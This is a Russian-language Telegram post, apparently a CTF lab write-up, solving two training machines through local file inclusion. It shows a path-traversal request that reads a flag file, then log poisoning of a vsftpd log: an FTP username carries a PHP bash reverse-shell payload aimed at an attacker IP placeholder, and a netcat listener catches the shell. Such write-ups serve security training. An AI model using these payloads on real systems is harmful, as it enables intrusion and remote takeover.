TGViewer
Сочный DevOps Сочный DevOps @andtree_sec · 420 subscribers
Post #186 166
Проходим машину web-2-1 и web-2-2 на hackbase.standoff

Задание в первой (web-2-1) звучит так - "Реализуйте LFI на узле www.edu.stf (10.124.1.235)."
LFI - local file inclusion - уязвимость позволяющая просматривать содержимое файлов на сервер через URL, query параметры и тд. (при наличии уязвимого кода само собой).

Открываем сайт в Burp, видим повторяющийся запрос GET /api/read.php?file=/opt/cpu.txt
Запрос подобного вида потенциально уязвим. Мы можем сразу получить флаг, выполнив - GET /api/read.php?file=../../../../../../etc/pt.flag

Второе задание звучит так:
"Получите RCE на узле www.edu.stf (10.124.1.235) посредством LFI."
Сканируем nmap-ом хост:
nmap -sC -sV <ip>


Находим запущенный vsftpd. Гуглим LFI + vsftd и понимаем, что есть возможность внедрить вредоносный php код и исполнить его, если vsftpd пишет лог с именем пользователя. Проверим любым ftp клиентом и используем LFI, чтобы прочитать лог - GET /api/read.php?file=../../../../var/log/vsftpd.log HTTP/1.1
Видим что имя пользователя выводится в логе. А читаем мы этот лог через уязвимый read.php (include/require функции внутри), который может выполнить php код, который мы вставим вместо имени пользователя.

ftp <ip>
USER: <?=`bash -c 'bash -i >& /dev/tcp/<YOU_IP>/4444 0>&1'`?>
PASS: <any>


Тут мы подключаемся по ftp и в поле юзера добавляем payload с reverse shell.
У себя ловим шел:
nc -lvnp 4444


Выполняем запрос на чтение vsftpd.log и получаем шелл. Для получение флага выполняем /home/rceflag

#ctf
  • 👍 1
More from @andtree_sec
  1. Sep 7, 2026Давненько не было сообщений. Скорее всего в будущем они уйдут в telegraf, который я еще не…
  2. Jul 6, 2026Последнее время на работе часто приходится работать с apache flink и даже что-то писать на…
  3. Jun 4, 2026Немножко про молекула тесты... У нас принято использовать в переменных lookup плагин для д…
  4. May 20, 2026Очередной небольшой проект. Веб-приложение, которое агрегирует через стандартный механиз g…
  5. May 15, 2026Включаем профилирование в ansible Профилирование, это вывод даты, времени запуска и итогов…
  6. Apr 17, 2026Так выглядит общий dashbord работы с инцидентами.
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →